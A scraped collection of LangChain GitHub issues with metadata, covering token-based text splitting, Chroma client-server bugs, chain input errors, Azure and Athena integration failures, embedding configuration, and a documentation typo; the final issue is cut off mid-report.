### Feature request LLMs usually limit text by tokens. It may be useful to split a large text into chunks according to the number of tokens rather than the number of characters. For example, if an LLM allows us to use 8000 tokens, and we want to split the text into chunks of up to 4000 tokens, then we can call ```python text_splitter = RecursiveCharacterTextSplitter(chunk_tokens = 4000, ... ``` ### Motivation If we split a text by number of characters, it is not obvious how many tokens these chunks will be. And at the same time, if we want to split a text into the biggest possible chunks while keeping them under a certain LLM token limit, we cannot operate by number of characters. ### Your contribution As an example for implementing `RecursiveCharacterTextSplitter(chunk_tokens=...)`, there is a very useful library that helps to split text into tokens: https://github.com/openai/tiktoken ```python import tiktoken def split_large_text(large_text, max_tokens): enc = tiktoken.get_encoding("cl100k_base") tokenized_text = enc.encode(large_text) chunks = [] current_chunk = [] current_length = 0 for token in tokenized_text: current_chunk.append(token) current_length += 1 if current_length >= max_tokens: chunks.append(enc.decode(current_chunk).rstrip(' .,;')) current_chunk = [] current_length = 0 if current_chunk: chunks.append(enc.decode(current_chunk).rstrip(' .,;')) return chunks ```
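The idea generalizes to any tokenizer; a small encoder-agnostic sketch, where the `encode`/`decode` callables stand in for tiktoken's `enc.encode`/`enc.decode`:

```python
def split_by_tokens(text, max_tokens, encode, decode):
    """Split text into chunks of at most max_tokens tokens each."""
    tokens = encode(text)
    return [
        decode(tokens[i : i + max_tokens])
        for i in range(0, len(tokens), max_tokens)
    ]
```

With tiktoken you would pass `enc.encode` and `enc.decode`; for a quick sanity check, whitespace tokenization (`str.split` / `" ".join`) works too.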
Split by Tokens instead of characters: RecursiveCharacterTextSplitter
https://api.github.com/repos/langchain-ai/langchain/issues/4678/comments
35
2023-05-14T18:16:05Z
2024-06-21T16:37:58Z
https://github.com/langchain-ai/langchain/issues/4678
1,709,029,487
4,678
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I am using Chroma's client-server configuration and I have trouble setting up a retriever for the ConversationalRetrievalChain.from_llm() function. I can't find anything related to this. Can someone guide me on how I can do that, or does someone have a solution? For the locally stored database you just called db.as_retriever() and that was it. But now, I can't find a solution for passing a retriever to the from_llm() function. My code snippet is: ``` def askQuestion(self, thread_id, question): collection = self.chroma_client.get_collection(name="my_collection5", embedding_function=self.embedding) self.llm = ChatOpenAI(model_name=self.model_name, temperature=self.temperature, openai_api_key=os.environ.get('OPENAI_API_KEY')) self.memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True, output_key='answer') self.chain = ConversationalRetrievalChain.from_llm(self.llm, collection.as_retriever(), return_source_documents=True, verbose=VERBOSE, memory=self.memory) result = self.chain({"question": question}) res_dict = { "answer": result["answer"], } res_dict["source_documents"] = [] # add source docs for source in result["source_documents"]: res_dict["source_documents"].append({ "page_content": source.page_content, "metadata": source.metadata }) return res_dict ``` ### Suggestion: _No response_
Issue: Set up a Chroma retriever for client-server configuration of Chroma
https://api.github.com/repos/langchain-ai/langchain/issues/4676/comments
3
2023-05-14T18:08:39Z
2024-03-16T22:56:10Z
https://github.com/langchain-ai/langchain/issues/4676
1,709,027,393
4,676
[ "langchain-ai", "langchain" ]
### System Info ``` langchain==0.0.168 chromadb==0.3.22 ``` ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Clone official ChromaDB repository and run their docker-compose environment. ``` git clone git@github.com:chroma-core/chroma.git docker-compose up ``` Create a folder called `my_data` and create a `test.txt` file into it with some random text. ``` mkdir my_data cd my_data echo "testingtestingtesting" > test.txt ``` Script to reproduce issue: ``` from langchain.text_splitter import RecursiveCharacterTextSplitter from langchain.embeddings.openai import OpenAIEmbeddings from langchain.vectorstores import Chroma from chromadb.config import Settings with open('my_data/test.txt', 'r', encoding="utf-8") as file: raw_text = file.read() text_splitter = RecursiveCharacterTextSplitter( chunk_size = 1000, chunk_overlap = 0, length_function = len, ) texts = text_splitter.split_text(raw_text) embeddings = OpenAIEmbeddings() client_settings = Settings( chroma_api_impl="rest", chroma_server_host="localhost", chroma_server_http_port="8000" ) collection_name = "chroma_test" vectorstore = Chroma.from_texts(embedding=embeddings, texts=texts, client_settings=client_settings, collection_name=collection_name) ``` Set necessary `OPENAI_API_KEY` environment variables and run the script. This will result in an error: `Exception: {"error":"InvalidUUID","message":"Could not parse chroma_test as a UUID"}` The same issue will not happen if you run ChromaDB locally like this. Only when calling the actual API you then run in to the issue. 
``` vectorstore = Chroma.from_texts(embedding=embeddings, texts=texts, persist_directory="db") ``` ### Expected behavior The expected behaviour would be that Langchain would call the ChromaDB API correctly with the `UUID` instead of the plaintext name of the collection. See chromaDB sourcecode and their API `chromadb\server\fastapi\__init__.py` Line `105` ``` self.router.add_api_route( "/api/v1/collections/{collection_id}/add", self.add, methods=["POST"], status_code=status.HTTP_201_CREATED, ) ``` Line `196` ``` def add(self, collection_id: str, add: AddEmbedding) -> None: try: result = self._api._add( collection_id=_uuid(collection_id), embeddings=add.embeddings, metadatas=add.metadatas, documents=add.documents, ids=add.ids, increment_index=add.increment_index, ) except InvalidDimensionException as e: raise HTTPException(status_code=500, detail=str(e)) return result ``` Line `67` ``` def _uuid(uuid_str: str) -> UUID: try: return UUID(uuid_str) except ValueError: raise InvalidUUIDError(f"Could not parse {uuid_str} as a UUID") ```
langchain chroma vectorstore calls ChromaDB API incorrectly when ChromaDB is running in Docker
https://api.github.com/repos/langchain-ai/langchain/issues/4674/comments
6
2023-05-14T17:26:09Z
2023-10-31T16:07:20Z
https://github.com/langchain-ai/langchain/issues/4674
1,709,016,097
4,674
[ "langchain-ai", "langchain" ]
### System Info I'm trying to make use of the sequential chaining functionality by chaining together two prompts like so: ``` # importing frameworks and such import os from apikey import apikey import streamlit as st from langchain.llms import OpenAI from langchain.prompts import PromptTemplate from langchain.chains import LLMChain, SimpleSequentialChain os.environ["OPENAI_API_KEY"] = apikey # Defning and building out our OOTB app framework via Streamlit st.title("Medical GPT") prompt = st.text_input("Enter your prompt here") # Defining our prompt template illness_template = PromptTemplate( input_variables=["condition"], template="Summarise the common symptoms for {condition}" ) treatment_template = PromptTemplate( input_variables=["illness"], template="Summarise the treatment for this illness ILLNESS: {illness}" ) # Defining our LLM and chains llm = OpenAI(temperature=0.7) illness_chain = LLMChain(llm=llm, prompt=illness_template, verbose=True) treatment_chain = LLMChain(llm=llm, prompt=treatment_template, verbose=True) sequential_chain = SimpleSequentialChain(chains=[illness_chain, treatment_chain]) # Return prompt output to frontend when a prompt is given if prompt: response = sequential_chain.run(topic=prompt) st.write(response) ``` For some reason, it keeps throwing the error: ``` Traceback (most recent call last): File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/streamlit/runtime/scriptrunner/script_runner.py", line 565, in _run_script exec(code, module.__dict__) File "/Users/user/Langchain_hacking/app.py", line 43, in <module> response = sequential_chain.run(topic=prompt) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/chains/base.py", line 239, in run return self(kwargs, callbacks=callbacks)[self.output_keys[0]] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File 
"/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/chains/base.py", line 123, in __call__ inputs = self.prep_inputs(inputs) ^^^^^^^^^^^^^^^^^^^^^^^^ File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/chains/base.py", line 216, in prep_inputs self._validate_inputs(inputs) File "/Library/Frameworks/Python.framework/Versions/3.11/lib/python3.11/site-packages/langchain/chains/base.py", line 83, in _validate_inputs raise ValueError(f"Missing some input keys: {missing_keys}") ValueError: Missing some input keys: {'input'} ``` I'm not entirely sure why it keeps throwing up this error, as far as the documentation goes I'm calling `SimpleSequentialChain` correctly unless I'm missing something? ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` if prompt: response = sequential_chain.run(topic=prompt) st.write(response) ``` ### Expected behavior LLM output
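For context, `SimpleSequentialChain` validates its inputs against a single expected key named `input`, so `run(topic=prompt)` fails while passing the string positionally — `sequential_chain.run(prompt)` — maps it to that key. A pure-Python sketch of the validation that produces this error:

```python
# Mirrors the shape of Chain._validate_inputs: the chain's expected key set
# is {"input"}, not whatever keyword the caller happens to use.
def validate_inputs(inputs, expected_keys):
    missing = set(expected_keys) - set(inputs)
    if missing:
        raise ValueError(f"Missing some input keys: {missing}")

validate_inputs({"input": "eczema"}, {"input"})      # accepted
try:
    validate_inputs({"topic": "eczema"}, {"input"})  # the failing call shape
except ValueError as err:
    print(err)  # Missing some input keys: {'input'}
```

This is a simplified mirror of langchain's internal check, shown only to explain where the key name comes from.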
ValueError: Missing some input keys: {'input'}
https://api.github.com/repos/langchain-ai/langchain/issues/4673/comments
3
2023-05-14T16:30:59Z
2023-08-08T20:08:15Z
https://github.com/langchain-ai/langchain/issues/4673
1,709,000,599
4,673
[ "langchain-ai", "langchain" ]
### System Info I tried to run this example: https://python.langchain.com/en/latest/use_cases/agent_simulations/characters.html But when I set the LLM with AzureChatOpenAI doesn't work. The error is: ``` Traceback (most recent call last): File "/home/adrian-ubuntu/projects/generative-agents/langchain_generative_agent.py", line 79, in <module> print(tommie.get_summary()) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/experimental/generative_agents/generative_agent.py", line 215, in get_summary self.summary = self._compute_agent_summary() File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/experimental/generative_agents/generative_agent.py", line 201, in _compute_agent_summary self.chain(prompt) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chains/base.py", line 239, in run return self(kwargs, callbacks=callbacks)[self.output_keys[0]] File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chains/base.py", line 140, in __call__ raise e File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chains/base.py", line 134, in __call__ self._call(inputs, run_manager=run_manager) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chains/llm.py", line 69, in _call response = self.generate([inputs], run_manager=run_manager) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chains/llm.py", line 79, in generate return self.llm.generate_prompt( File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chat_models/base.py", line 142, in generate_prompt return self.generate(prompt_messages, stop=stop, callbacks=callbacks) File 
"/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chat_models/base.py", line 90, in generate raise e File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chat_models/base.py", line 82, in generate results = [ File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chat_models/base.py", line 83, in <listcomp> self._generate(m, stop=stop, run_manager=run_manager) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chat_models/openai.py", line 293, in _generate response = self.completion_with_retry(messages=message_dicts, **params) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chat_models/openai.py", line 254, in completion_with_retry return _completion_with_retry(**kwargs) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/tenacity/__init__.py", line 289, in wrapped_f return self(f, *args, **kw) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/tenacity/__init__.py", line 379, in __call__ do = self.iter(retry_state=retry_state) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/tenacity/__init__.py", line 314, in iter return fut.result() File "/usr/lib/python3.10/concurrent/futures/_base.py", line 451, in result return self.__get_result() File "/usr/lib/python3.10/concurrent/futures/_base.py", line 403, in __get_result raise self._exception File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/tenacity/__init__.py", line 382, in __call__ result = fn(*args, **kwargs) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/langchain/chat_models/openai.py", line 252, in _completion_with_retry return self.client.create(**kwargs) File 
"/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/openai/api_resources/chat_completion.py", line 25, in create return super().create(*args, **kwargs) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/openai/api_resources/abstract/engine_api_resource.py", line 153, in create response, _, api_key = requestor.request( File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/openai/api_requestor.py", line 226, in request resp, got_stream = self._interpret_response(result, stream) File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/openai/api_requestor.py", line 620, in _interpret_response self._interpret_response_line( File "/home/adrian-ubuntu/projects/.venv_generative-agents/lib/python3.10/site-packages/openai/api_requestor.py", line 683, in _interpret_response_line raise self.handle_error_response( openai.error.InvalidRequestError: Resource not found Process finished with exit code 1 ``` But with a simple example like: ``` model = AzureChatOpenAI(deployment_name="gpt-35-turbo", max_tokens=1500) print(model([HumanMessage(content="Translate this sentence from English to French. I love programming.")])) ``` works perfectly (and both runs are configured with same env variables) Version of langchain: 0.0.168 ### Who can help? 
_No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` import logging from langchain.chat_models import AzureChatOpenAI from langchain.llms import AzureOpenAI logging.basicConfig(level=logging.ERROR) from datetime import datetime, timedelta from typing import List from termcolor import colored from langchain.docstore import InMemoryDocstore from langchain.embeddings import OpenAIEmbeddings from langchain.vectorstores import FAISS from langchain.retrievers import TimeWeightedVectorStoreRetriever from langchain.experimental.generative_agents import GenerativeAgent, GenerativeAgentMemory import math import faiss def relevance_score_fn(score: float) -> float: """Return a similarity score on a scale [0, 1].""" # This will differ depending on a few things: # - the distance / similarity metric used by the VectorStore # - the scale of your embeddings (OpenAI's are unit norm. Many others are not!) 
# This function converts the euclidean norm of normalized embeddings # (0 is most similar, sqrt(2) most dissimilar) # to a similarity function (0 to 1) return 1.0 - score / math.sqrt(2) def create_new_memory_retriever(): """Create a new vector store retriever unique to the agent.""" # Define your embedding model embeddings_model = OpenAIEmbeddings(deployment="text-embedding-ada-002_deploy", chunk_size=1) # Initialize the vectorstore as empty embedding_size = 1536 index = faiss.IndexFlatL2(embedding_size) vectorstore = FAISS(embeddings_model.embed_query, index, InMemoryDocstore({}), {}, relevance_score_fn=relevance_score_fn) return TimeWeightedVectorStoreRetriever(vectorstore=vectorstore, other_score_keys=["importance"], k=15) USER_NAME = "Person A" # The name you want to use when interviewing the agent. LLM = AzureChatOpenAI(deployment_name="gpt-35-turbo", max_tokens=1500) tommies_memory = GenerativeAgentMemory( llm=LLM, memory_retriever=create_new_memory_retriever(), verbose=True, reflection_threshold=8 # we will give this a relatively low number to show how reflection works ) tommie = GenerativeAgent(name="Tommie", age=25, traits="anxious, likes design, talkative", # You can add more persistent traits here status="looking for a job", # When connected to a virtual world, we can have the characters update their status memory_retriever=create_new_memory_retriever(), llm=LLM, memory=tommies_memory ) # The current "Summary" of a character can't be made because the agent hasn't made # any observations yet. print(tommie.get_summary()) ``` ### Expected behavior Just working
Generative Agents don't work with AzureChatOpenAI
https://api.github.com/repos/langchain-ai/langchain/issues/4670/comments
1
2023-05-14T14:54:48Z
2023-09-10T16:18:00Z
https://github.com/langchain-ai/langchain/issues/4670
1,708,972,374
4,670
[ "langchain-ai", "langchain" ]
### Issue with current documentation: https://python.langchain.com/en/latest/modules/agents/agents/custom_agent.html ### Idea or request for content: I was going through the documentation for creating a custom agent (https://python.langchain.com/en/latest/modules/agents/agents/custom_agent.html) and noticed a potential typo. In the section discussing the components of a custom agent, the text mentions that an agent consists of "three parts" but only two are listed: "Tools" and "The agent class itself". I believe the text should say "two parts" instead of "three". Could you please confirm if this is a typo, or if there's a missing third part that needs to be included in the list?
DOC: Typo in Custom Agent Documentation
https://api.github.com/repos/langchain-ai/langchain/issues/4668/comments
0
2023-05-14T12:52:17Z
2023-05-18T04:02:24Z
https://github.com/langchain-ai/langchain/issues/4668
1,708,934,167
4,668
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. During ingestion, a long document is split into multiple documents and embedded into the vector DB. At inference time, the top K chunks are returned as context fed to the LLM. In most cases this mechanism works well, but what if I want to make an overall summary of the document? Relying on the top K similarity results won't be sufficient — and what if the query is relevant to every chunk of the document? How can I make langchain digest every piece of the document before inference? ### Suggestion: _No response_
Is it possible to digest every piece of a document before inference?
https://api.github.com/repos/langchain-ai/langchain/issues/4667/comments
3
2023-05-14T11:14:14Z
2023-09-12T16:15:15Z
https://github.com/langchain-ai/langchain/issues/4667
1,708,906,341
4,667
[ "langchain-ai", "langchain" ]
### Feature request Rewriting the Langchain codebase and library in Mojo. https://www.modular.com/mojo ### Motivation Up to 35000x faster than Python for ML / DL applications. Utilize the full power of the hardware, including multiple cores, vector units, and exotic accelerator units, with the world's most advanced compiler and heterogeneous runtime. Achieve performance on par with C++ and CUDA without the complexity. Mojo leverages MLIR, which enables Mojo developers to take advantage of vectors, threads, and AI hardware units. Experience true interoperability with the Python ecosystem. Seamlessly intermix arbitrary libraries like Numpy and Matplotlib and your custom code with Mojo. ### Your contribution Will start tackling the topic with a team myself if: 1. Operating my own DGX cluster or 2. enough other people get on board to get the project started.
Rewrite Langchain in Mojo
https://api.github.com/repos/langchain-ai/langchain/issues/4666/comments
4
2023-05-14T09:17:24Z
2023-12-14T16:08:38Z
https://github.com/langchain-ai/langchain/issues/4666
1,708,874,996
4,666
[ "langchain-ai", "langchain" ]
### System Info langchain>=0.0.123 sqlalchemy==1.4.48 PyAthena[SQLAlchemy]>=1.2.0,<2.0.0 Python 3.10.11 ### Who can help? @hwchase17, @eyurtsev, @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. create aws athena engine and connect to athena engine_athena=create_engine('awsathena+rest://<keys>/<keys>@athena.us-east-1.amazonaws.com:443/<db_name>?s3_staging_dir=<bucket name>/&work_group=primary') db = SQLDatabase(engine_athena) Connection is established successfully. 2. db_chain = SQLDatabaseChain.from_llm(llm, db, prompt=PROMPT, verbose=True, return_intermediate_steps=True) 3. db_chain(query) where query is 'how many claims are there?' ### Expected behavior Expected behavior - SQL should run against Athena Error - TypeError: __init__() got an unexpected keyword argument 'bind' It seems bind was deprecated from sqlalchemy version 2.0 onwards. However, PyAthena recommended SQLAlchemy version is <2.0.0. **How can this be resolved? 
here is detailed error message:** ``` SELECT count (policy_id_0) FROM claims ; SQLQuery: --------------------------------------------------------------------------- TypeError Traceback (most recent call last) Input In [25], in <cell line: 2>() 1 print(query) ----> 2 result = db_chain(sql) 3 result File ~\Anaconda3\lib\site-packages\langchain\chains\base.py:140, in Chain.__call__(self, inputs, return_only_outputs, callbacks) 138 except (KeyboardInterrupt, Exception) as e: 139 run_manager.on_chain_error(e) --> 140 raise e 141 run_manager.on_chain_end(outputs) 142 return self.prep_outputs(inputs, outputs, return_only_outputs) File ~\Anaconda3\lib\site-packages\langchain\chains\base.py:134, in Chain.__call__(self, inputs, return_only_outputs, callbacks) 128 run_manager = callback_manager.on_chain_start( 129 {"name": self.__class__.__name__}, 130 inputs, 131 ) 132 try: 133 outputs = ( --> 134 self._call(inputs, run_manager=run_manager) 135 if new_arg_supported 136 else self._call(inputs) 137 ) 138 except (KeyboardInterrupt, Exception) as e: 139 run_manager.on_chain_error(e) File ~\Anaconda3\lib\site-packages\langchain\chains\sql_database\base.py:96, in SQLDatabaseChain._call(self, inputs, run_manager) 94 # If not present, then defaults to None which is all tables. 95 table_names_to_use = inputs.get("table_names_to_use") ---> 96 table_info = self.database.get_table_info(table_names=table_names_to_use) 97 llm_inputs = { 98 "input": input_text, 99 "top_k": self.top_k, (...) 
102 "stop": ["\nSQLResult:"], 103 } 104 intermediate_steps = [] File ~\Anaconda3\lib\site-packages\langchain\sql_database.py:167, in SQLDatabase.get_table_info(self, table_names) 164 continue 166 # add create table command --> 167 create_table = str(CreateTable(table).compile(self._engine)) 168 table_info = f"{create_table.rstrip()}" 169 has_extra_info = ( 170 self._indexes_in_table_info or self._sample_rows_in_table_info 171 ) File ~\Anaconda3\lib\site-packages\sqlalchemy\sql\elements.py:503, in ClauseElement.compile(self, bind, dialect, **kw) 498 url = util.preloaded.engine_url 499 dialect = url.URL.create( 500 self.stringify_dialect 501 ).get_dialect()() --> 503 return self._compiler(dialect, **kw) File ~\Anaconda3\lib\site-packages\sqlalchemy\sql\ddl.py:32, in _DDLCompiles._compiler(self, dialect, **kw) 28 def _compiler(self, dialect, **kw): 29 """Return a compiler appropriate for this ClauseElement, given a 30 Dialect.""" ---> 32 return dialect.ddl_compiler(dialect, self, **kw) File ~\Anaconda3\lib\site-packages\pyathena\sqlalchemy_athena.py:178, in AthenaDDLCompiler.__init__(self, dialect, statement, bind, schema_translate_map, compile_kwargs) 169 def __init__( 170 self, 171 dialect, (...) 175 compile_kwargs=util.immutabledict(), 176 ): 177 self._preparer = AthenaDDLIdentifierPreparer(dialect) --> 178 super(AthenaDDLCompiler, self).__init__( 179 dialect=dialect, 180 statement=statement, 181 bind=bind, 182 schema_translate_map=schema_translate_map, 183 compile_kwargs=compile_kwargs, 184 ) TypeError: __init__() got an unexpected keyword argument 'bind' ```
error while calling SQLDatabaseChain on AWS Athena
https://api.github.com/repos/langchain-ai/langchain/issues/4664/comments
1
2023-05-14T08:21:50Z
2023-05-18T04:24:46Z
https://github.com/langchain-ai/langchain/issues/4664
1,708,859,989
4,664
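The traceback above pins down the incompatibility: SQLAlchemy 2.0 removed the `bind` keyword from compiler constructors, while PyAthena < 2.0 still passes it. The practical fix is to pin `sqlalchemy>=1.4,<2.0` (matching PyAthena's own requirement) or upgrade PyAthena to a release that supports SQLAlchemy 2. A minimal guard for the version-gating logic (a sketch, not part of either library):

```python
def sqlalchemy2_bind_removed(version: str) -> bool:
    # SQLAlchemy 2.0 removed the `bind` keyword from compiler
    # constructors; PyAthena < 2.0 still passes it, which is exactly
    # what raises the TypeError in the traceback above.
    return int(version.split(".")[0]) >= 2

# With PyAthena pinned below 2.0, sqlalchemy must stay below 2.0 too:
assert sqlalchemy2_bind_removed("2.0.12")
assert not sqlalchemy2_bind_removed("1.4.48")
```

Such a check could run at startup to fail fast with a clear message instead of the opaque `TypeError` deep inside the chain.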
[ "langchain-ai", "langchain" ]
### System Info Runs under jupyterlab in docker platform : Linux-5.4.72-microsoft-standard-WSL2-x86_64-with-glibc2.29 python : 3.8.5 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction When trying to use a Llama model on local documents I have the following very basic piece of code : ```from langchain.llms import GPT4All from langchain.document_loaders import DirectoryLoader loader = DirectoryLoader('./', glob="**/*.yml", show_progress=True) local_model_path = './models/ggml-gpt4all-l13b-snoozy.bin' from langchain.embeddings import LlamaCppEmbeddings llama = LlamaCppEmbeddings(model_path=local_model_path) from langchain.indexes import VectorstoreIndexCreator index = VectorstoreIndexCreator(embeddings=llama).from_loaders([loader]) index.query("what are the CORE variables ?") ``` No specific requirement of any OpenAI tool, but I have the error below : ``` AVX = 1 | AVX2 = 1 | AVX512 = 0 | AVX512_VBMI = 0 | AVX512_VNNI = 0 | FMA = 1 | NEON = 0 | ARM_FMA = 0 | F16C = 1 | FP16_VA = 0 | WASM_SIMD = 0 | BLAS = 0 | SSE3 = 1 | VSX = 0 | --------------------------------------------------------------------------- ValidationError Traceback (most recent call last) <ipython-input-12-26dba7aded6b> in <module> 3 4 from langchain.indexes import VectorstoreIndexCreator ----> 5 index = VectorstoreIndexCreator(embeddings=llama).from_loaders([loader]) 6 index.query("what is the LHYFE variables ?") /usr/local/lib/python3.8/dist-packages/pydantic/main.cpython-38-x86_64-linux-gnu.so in pydantic.main.BaseModel.__init__() 
/usr/local/lib/python3.8/dist-packages/pydantic/main.cpython-38-x86_64-linux-gnu.so in pydantic.main.validate_model() /usr/local/lib/python3.8/dist-packages/pydantic/fields.cpython-38-x86_64-linux-gnu.so in pydantic.fields.ModelField.get_default() /usr/local/lib/python3.8/dist-packages/pydantic/main.cpython-38-x86_64-linux-gnu.so in pydantic.main.BaseModel.__init__() ValidationError: 1 validation error for OpenAIEmbeddings __root__ Did not find openai_api_key, please add an environment variable `OPENAI_API_KEY` which contains it, or pass 'openai_api_key' as a named parameter. (type=value_error) ``` Is there any specific configuration I missed? Many thanks for your kind help. ### Expected behavior I would have expected it to use the model stated in the code without any need for an OpenAI account.
Using LLama Embedings still rely on OpenAI key
https://api.github.com/repos/langchain-ai/langchain/issues/4661/comments
7
2023-05-14T07:04:36Z
2023-12-26T16:07:56Z
https://github.com/langchain-ai/langchain/issues/4661
1,708,841,518
4,661
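A likely cause (hedged — based on how `VectorstoreIndexCreator` was defined in langchain of that era): its field is named `embedding`, singular, with `OpenAIEmbeddings` as the default factory. The script passes the misspelled keyword `embeddings=`, which never reaches the field, so the default OpenAI constructor runs and demands an API key. A stand-in sketch of the mechanism (plain dataclass, illustrative names):

```python
from dataclasses import dataclass, field

def default_embedder() -> str:
    # Stand-in for OpenAIEmbeddings(): in the real library this default
    # factory is what raises "Did not find openai_api_key".
    return "OpenAIEmbeddings (default)"

@dataclass
class IndexCreator:
    # In langchain of that era the field is `embedding` (singular).
    embedding: str = field(default_factory=default_embedder)

# Without a recognised `embedding` keyword, the default factory fires:
assert IndexCreator().embedding == "OpenAIEmbeddings (default)"
# Spelling the keyword correctly keeps the local model:
assert IndexCreator(embedding="LlamaCppEmbeddings (local)").embedding == \
    "LlamaCppEmbeddings (local)"
```

If this is indeed the cause, `VectorstoreIndexCreator(embedding=llama)` should select the local model and no OpenAI key would be needed.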
[ "langchain-ai", "langchain" ]
### System Info error: ``` Traceback (most recent call last): File "/Users/delip/workspace/tmp/main3.py", line 38, in <module> asyncio.run(main()) File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/asyncio/runners.py", line 44, in run return loop.run_until_complete(main) File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/asyncio/base_events.py", line 616, in run_until_complete return future.result() File "/Users/delip/workspace/tmp/main3.py", line 32, in main await generate_concurrently() File "/Users/delip/workspace/tmp/main3.py", line 27, in generate_concurrently await asyncio.gather(*tasks) File "/Users/delip/workspace/tmp/main3.py", line 11, in async_generate resp = await llm.agenerate( File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/site-packages/langchain/chat_models/base.py", line 128, in agenerate raise e File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/site-packages/langchain/chat_models/base.py", line 118, in agenerate results = await asyncio.gather( File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/site-packages/langchain/chat_models/openai.py", line 322, in _agenerate message_dicts, params = self._create_message_dicts(messages, stop) File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/site-packages/langchain/chat_models/openai.py", line 304, in _create_message_dicts message_dicts = [_convert_message_to_dict(m) for m in messages] File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/site-packages/langchain/chat_models/openai.py", line 304, in <listcomp> message_dicts = [_convert_message_to_dict(m) for m in messages] File "/Users/delip/opt/anaconda3/envs/lhenv/lib/python3.8/site-packages/langchain/chat_models/openai.py", line 92, in _convert_message_to_dict raise ValueError(f"Got unknown type {message}") ValueError: Got unknown type ('content', 'you are a helpful bot') ``` langchain version ``` conda env export | grep langchain - langchain==0.0.168 ``` ### Who can help? 
